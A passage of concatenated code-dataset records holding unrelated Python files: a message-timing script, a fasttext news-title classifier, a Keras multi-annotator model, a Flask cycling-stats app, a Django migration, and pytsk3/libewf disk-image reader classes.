range(0,len(RecMList) ):\n # print(RecMList[i])\n # x = RecMList[i] - x\n # print(x)\n # exit(0)\n\n \n #designRate = [for line in Input_File for word in line if word is \"[\" ]\n\n AverageSize = [int(word[5:]) for line in temp_File for word in line.split() if \"size>\" in word]\n \n Msg1 = RecMList[0]\n Msg2 = RecMList[1]\n #lastMsg = RecMList[len(RecMList)-1]\n\n R = [int(i[-6:]) for i in RecMList] \n S = [int(i[-6:]) for i in SendMList]\n # print(\"R is \",R)\n # print(\"S is \", S)\n #exit(0)\n\n getDiffFromRandS = [abs(round((x-y)/1000000,4) ) for x, y in zip(R, S)] \n \n import numpy as np\n import math\n AverageSize = math.ceil(np.mean(AverageSize))\n \n mean = round(np.mean(getDiffFromRandS),4)\n \n msgpersec= 10**len(str(mean)[2:])\n\n table.extend((f[i],AverageSize,msgpersec, mean,Msg1,Msg2))\n print(\"Table:\",table)\n\n makeCVS([table])\n table = []\n \n return 
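The karbor test above runs the Glance protection plugin against a fake bank by overwriting collaborator methods with `mock.MagicMock()` instead of wiring up a real backend. A minimal sketch of that stubbing pattern, using a made-up `FakeSection` rather than karbor's real classes:

import mock   # the record's import; on Python 3, unittest.mock is equivalent

class FakeSection(object):
    def create_object(self, key, value):
        raise RuntimeError('no real backend available in tests')

section = FakeSection()
section.create_object = mock.MagicMock()          # swap the method in place
section.create_object('metadata', {'status': 'protecting'})
section.create_object.assert_called_once_with('metadata', {'status': 'protecting'})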
table\n\ngetAvgofTrafficMessagePeriod(f)","sub_path":"Get_the_Traffic_Size_Folder/mainInteresting.py","file_name":"mainInteresting.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"145010912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Joshua\n@Time : 2019/3/14 14:22\n@File : train_top_category.py\n@Desc : 训练英语新闻一级分类\n\"\"\"\n\nimport os\nimport json\nimport time\nimport random\nimport re\nimport string\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom preprocess.common_tools import CleanDoc, read_json_format_file, write_file\nfrom model_normal.fasttext_model import FastTextClassifier\nfrom evaluate.eval_calculate import EvaluateModel\n\n\nimport logging\nfrom utils.logger import Logger\nfrom setting import LOG_PATH\n\nlog_file = os.path.join(LOG_PATH, 'fasttext_train_log')\nlog = Logger(\"fasttext_train_log\", log2console=True, log2file=True, logfile=log_file).get_logger()\n\nclass DataSet(object):\n\n def __init__(self, data_path, business_type='news_category', k=5, logger=None):\n if os.path.exists(data_path) and os.path.isdir(data_path):\n self.data_path = data_path\n else:\n raise Exception('数据路径不存在,请检查路径')\n\n if logger:\n self.log = logger\n else:\n self.log = logging.getLogger(\"fasttext_train_log\")\n self.log.setLevel(logging.INFO)\n self.k = k\n self.bt = business_type\n self.label_idx_map = {\"national\": 4, \"tech\": 10,\n \"sports\": 6, \"science\": 9,\n \"international\": 3, \"business\": 8,\n \"entertainment\": 15, \"lifestyle\": 12,\n \"auto\": 11}\n self.idx_label_map = dict((str(k), v) for v, k in self.label_idx_map.items())\n self.split_dataset()\n\n def split_dataset(self):\n self.log.info(\"预处理数据文件...\")\n # print(\">>>>> 预处理数据文件...\")\n fnames = os.listdir(self.data_path)\n datafiles = [os.path.join(self.data_path, fname) for fname in fnames]\n data_all = list()\n class_cnt = dict()\n s = time.time()\n for datafile in datafiles:\n # print(\">>>>> 正在处理数据文件:{}\".format(datafile))\n self.log.info(\"正在处理数据文件:{}\".format(datafile))\n for line in read_json_format_file(datafile):\n # dataY = line[\"one_level\"]\n if self._preline(line):\n dataX, dataY = self._preline(line).split('\\t__label__')\n dataY = line[\"one_level\"]\n if str(dataY) in class_cnt:\n class_cnt[str(dataY)] += 1\n else:\n class_cnt[str(dataY)] = 1\n if class_cnt[str(dataY)] < 40001 and dataX != \"\":\n data_all.append(line)\n else:\n continue\n e = time.time()\n self.log.info('数据分类耗时: {}s'.format(e - s))\n self.log.info('所有数据分类情况: {}'.format(json.dumps(class_cnt, indent=4)))\n self._generate_kfold_data(data_all)\n return\n\n def _generate_kfold_data(self, data_all):\n \"\"\"\n 按照label分层数据\n :param train_format_data:\n :return:\n \"\"\"\n s = time.time()\n random.shuffle(data_all)\n datax = [self._preline(i).split('\\t__label__')[0] for i in data_all]\n datay = [self._preline(i).split('\\t__label__')[1] for i in data_all]\n e1 = time.time()\n self.log.info('数据分X\\Y耗时: {}s'.format(e1 - s))\n\n skf = StratifiedKFold(n_splits=self.k)\n i = 0\n for train_index, test_index in skf.split(datax, datay):\n i += 1\n e2 = time.time()\n train_label_count = self._label_count([datay[i] for i in train_index])\n test_label_count = self._label_count([datay[j] for j in test_index])\n train_data = [self._preline(data_all[i]) for i in train_index]\n test_data = [self._preline(data_all[j]) for j in test_index]\n train_check = [data_all[i] for i in train_index]\n test_check = [data_all[i] 
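The traffic script above diffs only the last six digits (the microsecond field) of paired RECV/sent timestamps, which breaks whenever the seconds field rolls over. A sketch of a more robust pairing that subtracts full datetimes parsed with the same '%H:%M:%S.%f' format (the timestamp values here are made-up samples):

from datetime import datetime

fmt = '%H:%M:%S.%f'
recv = ['00:00:01.250000', '00:00:02.500000']   # made-up sample timestamps
sent = ['00:00:01.000000', '00:00:02.100000']

deltas = [(datetime.strptime(r, fmt) - datetime.strptime(s, fmt)).total_seconds()
          for r, s in zip(recv, sent)]
print(round(sum(deltas) / len(deltas), 4))      # 0.325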
for i in test_index]\n e3 = time.time()\n self.log.info('数据分训练集、测试集耗时: {}s'.format(e3 - e2))\n\n model_data_path = self._mkdir_path(i)\n train_file = os.path.join(model_data_path, 'train.txt')\n test_file = os.path.join(model_data_path, 'test.txt')\n train_check_file = os.path.join(model_data_path, 'train_check.json')\n test_check_file = os.path.join(model_data_path, 'test_check.json')\n write_file(train_file, train_data, 'txt')\n write_file(test_file, test_data, 'txt')\n write_file(train_check_file, train_check, 'json')\n write_file(test_check_file, test_check, 'json')\n\n self.log.info('文件:{}\\n训练数据类别统计:{}'.format(train_file, json.dumps(train_label_count, indent=4)))\n self.log.info('文件:{}\\n测试数据类别统计:{}'.format(test_file, json.dumps(test_label_count, indent=4)))\n if i == 1:\n break\n\n def _preline(self, line_json):\n if not isinstance(line_json, dict):\n self.log.error(\"该文本行不是json类型\")\n raise Exception(\"该文本行不是json类型\")\n title = line_json[\"title\"]\n content = \"\"\n dataY = str(self.label_idx_map.get(line_json[\"one_level\"]))\n\n if \"content\" in line_json:\n content = line_json[\"content\"]\n elif \"html\" in line_json:\n content = self._parse_html(line_json[\"html\"])\n # dataX = clean_string((title + '.' + content).lower()) # 清洗数据\n # dataX = CleanDoc(title.lower()).text # 清洗数据\n dataX = self.clean_title(title) # 清洗数据\n\n if dataX:\n _data = dataX + \"\\t__label__\" + dataY\n return _data\n else:\n return None\n\n\n def _label_count(self, label_list):\n label_count = dict()\n for i in label_list:\n if i in label_count:\n label_count[i] += 1\n else:\n label_count[i] = 1\n return label_count\n\n def _mkdir_path(self, i):\n curr_data_path = os.path.join(self.data_path, \"{}_model_{}\".format(self.bt, i))\n if not os.path.exists(curr_data_path):\n # os.mkdir(data_path)\n model_data_path = os.path.join(curr_data_path, \"data\")\n os.makedirs(model_data_path)\n return model_data_path\n else:\n raise Exception('已存在该路径')\n\n\n def clean_title(self, text):\n text = text.replace(\"\\r\", \" \").replace(\"\\n\", \" \").replace(\"\\t\", \" \")\n text = text.lower()\n no_emoji = CleanDoc(text).remove_emoji(text)\n del_symbol = string.punctuation # ASCII 标点符号\n remove_punctuation_map = dict((ord(char), \" \") for char in del_symbol)\n text = no_emoji.translate(remove_punctuation_map) # 去掉ASCII 标点符号\n text = re.sub(r\"\\s+\", \" \", text)\n return text\n\n\n def _parse_html(self,html):\n pass\n\nclass NewsCategoryModel(object):\n\n def __init__(self, data_path, business_type='news_category', k=5, logger=None):\n if os.path.exists(data_path) and os.path.isdir(data_path):\n self.data_path = data_path\n else:\n raise Exception('数据路径不存在,请检查路径')\n\n if logger:\n self.log = logger\n else:\n self.log = logging.getLogger(\"fasttext_train_log\")\n self.log.setLevel(logging.INFO)\n self.k = k\n self.bt = business_type\n self.label_idx_map = {\"national\": 4, \"tech\": 10,\n \"sports\": 6, \"science\": 9,\n \"international\": 3, \"business\": 8,\n \"entertainment\": 15, \"lifestyle\": 12,\n \"auto\": 11}\n self.idx_label_map = dict((str(k), v) for v, k in self.label_idx_map.items())\n\n def train_model(self):\n for i in range(self.k):\n s = time.time()\n _model = \"{}_model_{}\".format(self.bt, i+1)\n _data_path = os.path.join(self.data_path, _model)\n if os.path.exists(_data_path):\n model_path = os.path.join(_data_path, '{}_model'.format(self.bt))\n train_test_data_path = os.path.join(_data_path, 'data')\n classifier = FastTextClassifier(model_path, train=True, file_path=train_test_data_path, 
logger=self.log)\n test_check_path = os.path.join(train_test_data_path, 'test_check.json')\n test_check_pred_path = os.path.join(train_test_data_path, 'test_check_pred.json')\n train_check_path = os.path.join(train_test_data_path, 'train_check.json')\n train_check_pred_path = os.path.join(train_test_data_path, 'train_check_pred.json')\n e = time.time()\n self.log.info('训练模型耗时: {}s'.format(e - s))\n # self.predict2file(classifier, train_check_path, train_check_pred_path)\n # self.predict2file(classifier, test_check_path, test_check_pred_path)\n label_list = sorted([self.idx_label_map.get(i.replace(\"__label__\", \"\")) for i in classifier.model.labels])\n self.log.info(\"模型标签:\\n{}\".format(label_list))\n # self.evaluate_model(test_check_pred_path, \"one_level\", labels=label_list)\n else:\n continue\n return\n\n def predict2file(self, classifier, json_file, json_out_file):\n with open(json_out_file, 'w', encoding='utf-8') as joutfile:\n s = time.time()\n for line in read_json_format_file(json_file):\n _data = self._preline(line)\n if _data:\n labels = classifier.predict([_data])\n line['predict_one_level'] = self.idx_label_map[labels[0][0][0].replace(\"'\", \"\").replace(\"__label__\", \"\")]\n # print(line['predict_top_category'])\n line['predict_one_level_proba'] = labels[0][0][1]\n joutfile.write(json.dumps(line) + \"\\n\")\n del line\n else:\n continue\n e = time.time()\n self.log.info('预测及写入文件耗时: {}s'.format(e - s))\n\n def _preline(self, line_json):\n if not isinstance(line_json, dict):\n self.log.error(\"该文本行不是json类型\")\n raise Exception(\"该文本行不是json类型\")\n title = line_json[\"title\"]\n # dataX = clean_string((title + '.' + content).lower()) # 清洗数据\n dataX = self.clean_title(title) # 清洗数据\n if dataX:\n _data = dataX\n return _data\n else:\n return None\n\n def clean_title(self, text):\n text = text.replace(\"\\r\", \" \").replace(\"\\n\", \" \").replace(\"\\t\", \" \")\n text = text.lower()\n no_emoji = CleanDoc(text).remove_emoji(text)\n del_symbol = string.punctuation # ASCII 标点符号,数字\n remove_punctuation_map = dict((ord(char), \" \") for char in del_symbol)\n text = no_emoji.translate(remove_punctuation_map) # 去掉ASCII 标点符号\n text = re.sub(r\"\\s+\", \" \", text)\n return text\n\n def evaluate_model(self, datapath, key_, labels=None):\n em = EvaluateModel(datapath, key_name=key_, logger=self.log, label_names=labels)\n return em.evaluate_model_v2()\n\n\nif __name__ == '__main__':\n s = time.time()\n dataDir = \"/data/en_news\"\n # dataDir = \"/data/emotion_analysis/taste_ft_model\"\n # DataSet(dataDir, logger=log)\n bcm = NewsCategoryModel(dataDir, logger=log)\n bcm.train_model()\n e = time.time()\n print('训练新闻title分类模型耗时{}'.format(e - s))\n\n","sub_path":"nlp/text_categorization/en_news/train_news_category.py","file_name":"train_news_category.py","file_ext":"py","file_size_in_byte":11832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"286320346","text":"import math\nlst1=input().split()\nlst1=list(map(int,lst1))\nlst2=input().split()\nlst2=list(map(int,lst2))\ndef val(lst):\n value = 0\n for i, ch in enumerate(lst.reverse()):\n if int(ch) == 1:\n value += int(math.pow(-2, i))\n else:\n continue\n return value\n \nvalue = val(lst1) + val(lst2)\nres = []\nwhile value:\n res.append(value % (2))\n value = - (value // 2)\nif value==0:\n print([0])\nelse:\n 
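The fasttext trainer above partitions its data with `StratifiedKFold`, which keeps each fold's label distribution matched to the whole set, and then stops after the first fold (`if i == 1: break`). A self-contained sketch of that behavior on a toy two-class list:

from sklearn.model_selection import StratifiedKFold

X = list(range(10))
y = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]

skf = StratifiedKFold(n_splits=5)
for train_idx, test_idx in skf.split(X, y):
    print(sorted(y[i] for i in test_idx))   # each test fold holds one sample per class
    break                                   # the trainer above also consumes only fold 1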
print(res)","sub_path":"Code/CodeRecords/2381/61046/310480.py","file_name":"310480.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"208469067","text":"\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.io import savemat\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom scipy.stats import mode \nimport pandas as pd\nimport matplotlib.pyplot as plt \nfrom sklearn.metrics import roc_auc_score\n\n\ndef data_partitionMA(X,Y,t,ind,frac,seed):\n import math\n \"\"\" Function to partition data into train, test\n ind --> matrix with shufled index (w,N) where w are the different possible random states\n frac --> fraction of data for training\n seed --> fixed random state for reproducibility\n \"\"\"\n N = X.shape[0]\n Xtrain = X[ind[seed][:math.ceil(N*frac)]]\n Ytrain = Y[ind[seed][:math.ceil(N*frac)]]\n ttrain = t[ind[seed][:math.ceil(N*frac)]]\n\n Xtest = X[ind[seed][math.ceil(N*frac):]]\n Ytest = Y[ind[seed][math.ceil(N*frac):]]\n ttest = t[ind[seed][math.ceil(N*frac):]]\n\n return Xtrain, Ytrain, ttrain, Xtest, Ytest, ttest\n\ndef ook(t):\n\n if len(np.unique(t))!=2:\n lb = LabelBinarizer()\n y_ook = lb.fit_transform(t)\n else:\n lb = LabelBinarizer()\n y_ook = lb.fit_transform(t)\n y_ook = np.concatenate((1-y_ook.astype(bool), y_ook), axis = 1) \n\n return y_ook\n\n\ndef bin_Y(Y):\n lb = LabelBinarizer()\n lb.fit(np.unique(Y))\n N = Y.shape[0] \n K = len(np.unique(Y))\n R = Y.shape[1]\n Ynew = np.zeros([N,K,R])\n for i in range(N):\n\n if K != 2:\n y_b = lb.transform(Y[i])\n\n else:\n y_b = lb.transform(Y[i])\n y_b = np.concatenate((1-y_b.astype(bool), y_b), axis = 1) \n\n Ynew[i,:,:] = y_b.T\n\n return Ynew\n\nfrom sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\n # Define custom loss\ndef custom_loss(K,R):\n #pi [N,R]\n\n #@tf.function() #decorador para operar sobre python, mas lento y poco efectivo en muchos casos\n # Create a loss function that adds the MSE loss to the mean of all squared activations of a specific layer\n def max_like(y_true, y_pred): # y_true [batch_size, K, R]\n #kernels###############################################\n N = y_true.shape[0]\n #K = y_pred[:, R:].shape[1]\n #K = np.unique(y_true).size\n y_hat = tf.repeat(tf.expand_dims(y_pred[:, :K],-1), R, axis = -1)\n\n pi = y_pred[:, K:]\n\n p_logreg = tf.math.reduce_prod(tf.math.pow(y_hat, y_true), axis=1)\n\n temp1 = pi*p_logreg \n temp2 = (1-pi)/K\n Zp = temp1/tf.math.add(temp1,temp2)\n \n #Likelihood \n\n temp1 = Zp*tf.math.log(pi*p_logreg) \n temp2 = (1-Zp)*tf.math.log((1-pi)*1/K) \n\n #####funcion de costo############################################\n f = -tf.math.reduce_sum(tf.math.add(temp1,temp2))\n return f\n \n # Return a function\n return max_like\n\ndef scheduler1(step = 8, ratio = 1.2):\n def scheduler(epoch, lr):\n if epoch % step == 0 and epoch>1:\n return lr/ratio\n else:\n return lr\n return scheduler\n\n\ndef scheduler2(epoch, lr):\n if epoch < 10:\n return lr\n else:\n return lr * tf.math.exp(-0.01)\n\n\nclass Keras_MA_pi_lin(BaseEstimator, TransformerMixin):\n def __init__(self, K, R, P, epochs=30,batch_size=64,learning_rate=1e-3,optimizer='RMS',\n l1_param=1e-3,l2_param=1e-3,validation_split=0.3,verbose=1,\n w_init=False, w2_init=False, 
ratio = 1.2):\n self.epochs = epochs\n self.batch_size = batch_size\n self.learning_rate=learning_rate \n self.l1_param=l1_param \n self.l2_param=l2_param\n self.validation_split = validation_split\n self.verbose = verbose\n self.optimizer = optimizer\n self.w_init = w_init\n self.w2_init = w2_init\n self.ratio = ratio\n self.K = K\n self.R = R\n self.P = P\n\n \n def fit(self, X, t):\n #lb = LabelBinarizer()\n #lb.fit(X[:,-1])\n #N = X.shape[0]\n #y = np.zeros([N, self.K, self.R])\n #for i in range(N):\n # y[i,:,:] = binarize(X[i,self.P:],lb).T\n\n y = bin_Y(X[:,self.P:])\n\n Xt = X[:,:self.P]\n if self.optimizer == \"Adam\":\n opt = tf.keras.optimizers.Adam(learning_rate=self.learning_rate)\n elif self.optimizer == \"SGD\":\n opt = tf.keras.optimizers.SGD(learning_rate=self.learning_rate)\n elif self.optimizer == \"RMS\":\n opt = tf.keras.optimizers.RMSprop(learning_rate=self.learning_rate)\n else:\n opt=self.optimizer\n\n \n ###acomodar arquitectura de red###### \n tf.keras.backend.clear_session()\n\n inputA = tf.keras.layers.Input(shape=(Xt.shape[1]), name='entradaA')\n\n Q1 = self.K ## num clases\n Q2 = self.R ## num anotadores\n l1 = self.l1_param\n l2 = self.l2_param\n \n if self.w_init.any():\n initializer = tf.keras.initializers.Constant(value=self.w_init)\n else:\n initializer = tf.random_uniform_initializer(minval=-1, maxval=1)\n\n if self.w2_init.any():\n initializer2 = tf.keras.initializers.Constant(value=self.w2_init)\n else:\n initializer2 = tf.random_uniform_initializer(minval=-1, maxval=1)\n\n hW = tf.keras.layers.Dense(Q1,activation='softmax',name='Yhat', kernel_initializer=initializer, bias_initializer='zeros',\n kernel_regularizer=tf.keras.regularizers.l1_l2(l1=l1,l2=l2))(inputA)\n \n hW2 = tf.keras.layers.Dense(Q2,activation='sigmoid',name='PI', kernel_initializer=initializer2, bias_initializer='zeros',\n kernel_regularizer=tf.keras.regularizers.l1_l2(l1=l1,l2=l2))(inputA)\n\n concAB = tf.keras.layers.concatenate([hW,hW2],name='concAB')\n\n self.model = tf.keras.Model(inputs=inputA, outputs=concAB)\n self.model.compile(loss=custom_loss(K=self.K, R= self.R), \n optimizer=opt) #f1, precision, recall, crossentropy\n\n callback1 = tf.keras.callbacks.TerminateOnNaN()\n callback2 = tf.keras.callbacks.LearningRateScheduler(scheduler1(ratio = self.ratio))\n #callback2 = tf.keras.callbacks.LearningRateScheduler(scheduler2)\n callback3 = tf.keras.callbacks.EarlyStopping(monitor=\"loss\", min_delta=1e-3,\n patience=10, verbose=0, mode=\"auto\",\n baseline=None, restore_best_weights=True)\n\n \n self.history = self.model.fit(x = Xt, y = y,\n epochs=self.epochs,batch_size=self.batch_size,\n validation_split=self.validation_split, \n callbacks = [callback1, callback2, callback3], \n verbose = self.verbose)\n \n def predict(self, X, *_):\n pred = self.model.predict(X[:,:self.P])[:,:self.K]\n return np.argmax(pred, axis=1)\n \n def predict_proba(self, X, *_):\n pred = self.model.predict(X[:,:self.P])[:,:self.K]\n return pred\n\n def plot_history_loss(self):\n plt.plot(self.history.history['loss'],label='loss')\n plt.plot(self.history.history['val_loss'],label='val_loss')\n plt.legend()\n return\n \n def score(self, X, t):\n accuracy = np.mean(self.predict(X)==t.T)\n\n try:\n auc = roc_auc_score(ook(t), self.predict_proba(X))\n except:\n auc = 0.5\n \n dist = np.sqrt((np.mean(accuracy)-1)**2+(np.mean(auc)-1)**2)\n\n return 
-dist\n","sub_path":"models/MA_pi_linear_keras.py","file_name":"MA_pi_linear_keras.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174845259","text":"# -*- coding: utf-8 -*-\nimport psutil\nimport sys\nfrom bench_from_pid import BenchFromPid\nfrom b3j0f.conf import Configurable\nfrom time import sleep\n\n\n@Configurable(paths='bench.conf')\nclass FromName(object):\n\n def __init__(self, names, *args, **kwargs):\n super(FromName, self).__init__(*args, **kwargs)\n self.names = names\n self.instances = []\n\n def launch(self):\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid', 'name'])\n except psutil.NoSuchProcess:\n pass\n else:\n if pinfo['name'] in self.names:\n print(pinfo['name'], pinfo['pid'])\n self.instances.append(BenchFromPid(pinfo['pid']))\n for i in self.instances:\n i.start()\n sleep(self.duration)\n for i in self.instances:\n i.stop()\n i.join()\n\nif __name__ == '__main__':\n args = sys.argv\n args.pop(0)\n fromname = FromName(args)\n fromname.launch()\n","sub_path":"dowan/benchmarker/from_name.py","file_name":"from_name.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277776561","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='article',\n name='tid',\n field=models.CharField(unique=True, verbose_name='文章的唯一ID', max_length=64, blank=True),\n ),\n migrations.AlterField(\n model_name='article',\n name='category',\n field=models.ForeignKey(verbose_name='类别', to='article.cate', related_name='article_cate'),\n ),\n migrations.AlterField(\n model_name='cate',\n name='cate_addtime',\n field=models.DateTimeField(verbose_name='类别添加时间', blank=True),\n ),\n ]\n","sub_path":"blog/article/migrations/0002_auto_20160819_1631.py","file_name":"0002_auto_20160819_1631.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"165123424","text":"# === Import Section === #\nfrom flask import ( Flask, \n render_template,\n url_for,\n redirect, \n request, \n flash )\n\nfrom helper import ( getAvatar,\n getFollowerStats,\n )\n\nfrom dbHelper import ( getYearlySummary,\n syncStravaActivities, \n getBikeMileage, \n getYearlyGoals, \n addUpdateGoal, \n doBikesExist, \n addBike2DB,\n getMyBikes,\n removeBikeFromDB,\n addBikeNotes,\n getBikeNotes )\n\nfrom charts import ( monthlyMileageBarChart,\n last4WeeksDotChart )\n# === Import Section === #\n\n# Initialize Flask object\napp = Flask(__name__)\napp.secret_key = 'i234aessser54234lajdflkjasdlkjf;oiadalkjuhpoiqw'\n\n# Index Route \n@app.route('/')\ndef index():\n yearlySummary = getYearlySummary()\n myAvatar = getAvatar()\n followerStats = getFollowerStats()\n totalMiles = totalTime = 0\n for row in yearlySummary:\n totalMiles = totalMiles + row[1]\n totalTime = totalTime + row[2]\n totalKms = int(float(totalMiles) * 1.60934)\n totalSummaryList = [totalMiles, totalKms, totalTime]\n monthlyMileageData = monthlyMileageBarChart()\n last4WeeksDotData = last4WeeksDotChart()\n bikeMileage = getBikeMileage()\n# yearlySummary = totalSummaryList = monthlyMileageData = speedStatsData = last4WeeksDotData = bikeMileage = None\n 
return render_template('index.html', \n followerStats=followerStats,\n myAvatar=myAvatar,\n yearlySummary=yearlySummary,\n totalSummaryList=totalSummaryList,\n monthlyMileageData=monthlyMileageData,\n last4WeeksDotData=last4WeeksDotData,\n bikeMileage=bikeMileage,\n )\n\n# Goals Route\n@app.route('/goals')\ndef goals():\n followerStats = getFollowerStats()\n yearlyGoals = getYearlyGoals()\n return render_template('goals.html',\n followerStats=followerStats,\n yearlyGoals=yearlyGoals)\n\n# My Bikes Route\n@app.route('/mybikes', methods=['GET', 'POST'])\ndef mybikes():\n myBikesData = None\n bikeNotes = None\n followerStats = getFollowerStats()\n if doBikesExist():\n myBikesData = getMyBikes()\n else:\n flash(\"You don't have any bikes added. Please add a bike using the button above!!\")\n if request.method == \"POST\":\n bikeNotes = getBikeNotes(request.form['name'])\n return render_template('mybikes.html',\n followerStats=followerStats,\n myBikesData=myBikesData,\n bikeNotes=bikeNotes)\n\n# Sync Strava activities\n@app.route('/syncstrava')\ndef syncstrava():\n activitiesSynced = syncStravaActivities()\n if activitiesSynced is None:\n flash(\"No more activities to sync!!\")\n else:\n flash(\"Cool!! %d new activities synced from Strava\" % activitiesSynced)\n return redirect(url_for('index'))\n\n# Update Goal Route\n@app.route('/updateGoal', methods=['POST'])\ndef updateGoal():\n if request.method == \"POST\":\n curYearGoal = request.form['goal']\n if not curYearGoal:\n flash(\"Please enter a distance goal in miles before clicking Update\")\n else:\n goalUpdate = addUpdateGoal(int(curYearGoal))\n if goalUpdate is True:\n flash(\"Goals Updated!!\")\n else:\n flash(\"Operation failed!!\")\n return redirect(url_for('goals'))\n\n# Add Bike Route\n@app.route('/addbike', methods=['POST'])\ndef addbike():\n name = request.form['name']\n purchasedon = request.form['purchasedon']\n purchasedfrom = request.form['purchasedfrom']\n cost = request.form['cost']\n comments = request.form['comments']\n bike = {\n 'name' : name,\n 'purchasedon' : purchasedon,\n 'purchasedfrom' : purchasedfrom,\n 'cost' : float(cost),\n 'comments' : comments\n }\n addBike2DB(bike)\n return redirect(url_for('mybikes'))\n\n# Remove Bike Route\n@app.route('/removebike/')\ndef removebike(bike):\n removeBikeFromDB(bike)\n return redirect(url_for('mybikes'))\n\n# Add Bike Notes Route\n@app.route('/addbikeNotes', methods=['POST'])\ndef addbikeNotes():\n bikeNotes = {\n 'name' : request.form['name'],\n 'date' : request.form['date'],\n 'notes': request.form['notes'],\n 'cost' : float(request.form['cost'])\n }\n addBikeNotes(bikeNotes)\n return redirect(url_for('mybikes'))\n\n# Main Function\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8004, debug=True)\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83756291","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport bisect\nimport sys\n\nimport pyewf\nimport pyvmdk\nimport pyvhdi\nimport pytsk3\nimport pyqcow\n\n#import pyaff\n\nclass CARPE_Image(pytsk3.Img_Info):\n def __init__(self, img_hanle):\n super(CARPE_Image, self).__init__()\n self._partition_table = pytsk3.Volume_Info(img_hanle)\n\nclass vhdi_img_info(pytsk3.Img_Info):\n def __init__(self, vhdi_file):\n self._vhdi_file = vhdi_file\n super(vhdi_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n 
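The Flask routes above follow the post/redirect/get pattern: after a mutating request they queue a message with `flash()` and send the browser back to a GET view via `redirect(url_for(...))`. A minimal sketch (route names and the secret value are placeholders, not the app's real ones):

from flask import Flask, flash, redirect, url_for

app = Flask(__name__)
app.secret_key = 'placeholder-secret'   # flash() requires a secret key for the session

@app.route('/')
def index():
    return 'ok'

@app.route('/sync')
def sync():
    flash('Sync finished!')             # queue a one-shot message
    return redirect(url_for('index'))   # browser re-requests the GET view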
self._vhdi_file.close()\n\n def read(self, offset, size):\n self._vhdi_file.seek(offset)\n return self._vhdi_file.read(size)\n\n def get_size(self):\n return self._vhdi_file.get_media_size()\n\nclass vmdk_img_info(pytsk3.Img_Info):\n def __init__(self, vmdk_handle):\n self._vmdk_handle = vmdk_handle\n super(vmdk_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._vmdk_handle.close()\n\n def read(self, offset, size):\n self._vmdk_handle.seek(offset)\n return self._vmdk_handle.read(size)\n\n def get_size(self):\n return self._vmdk_handle.get_media_size()\n\nclass ewf_img_info(pytsk3.Img_Info):\n \"\"\"\n An image info class which uses ewf as a backing reader.\n\n All we really need to do to provide TSK with the ability to read image formats\n is override the methods below.\n \"\"\"\n def __init__(self, ewf_handle):\n # stores ewf_handle in class as new variable\n self._ewf_handle = ewf_handle\n super(ewf_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n \n # The following methods override pytsk3's Img_Info methods which would not know how to handle the e01 image\n # close Closes a ewf object\n def close(self):\n self._ewf_handle.close()\n # end of close -----------------------------------\n \n # read allows an e01 file to be opened/read by specifying where the file system info is on the image\n def read(self, offset, size):\n self._ewf_handle.seek(offset)\n return self._ewf_handle.read(size)\n # end of read ------------------------------------------------\n \n # get_size gets the size of the image\n def get_size(self):\n return self._ewf_handle.get_media_size()\n\nclass QcowImgInfo(pytsk3.Img_Info):\n def __init__(self, filename):\n self._qcow_file = pyqcow.file()\n self._qcow_file.open(filename)\n super(QcowImgInfo, self).__init__(\n url='', type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._qcow_file.close()\n\n def read(self, offset, size):\n self._qcow_file.seek(offset)\n return self._qcow_file.read(size)\n\n def get_size(self):\n return self._qcow_file.get_media_size()\n\nclass SplitImage(pytsk3.Img_Info):\n \"\"\"\n Virtualize access to split images.\n\n Note that unlike other tools (e.g. 
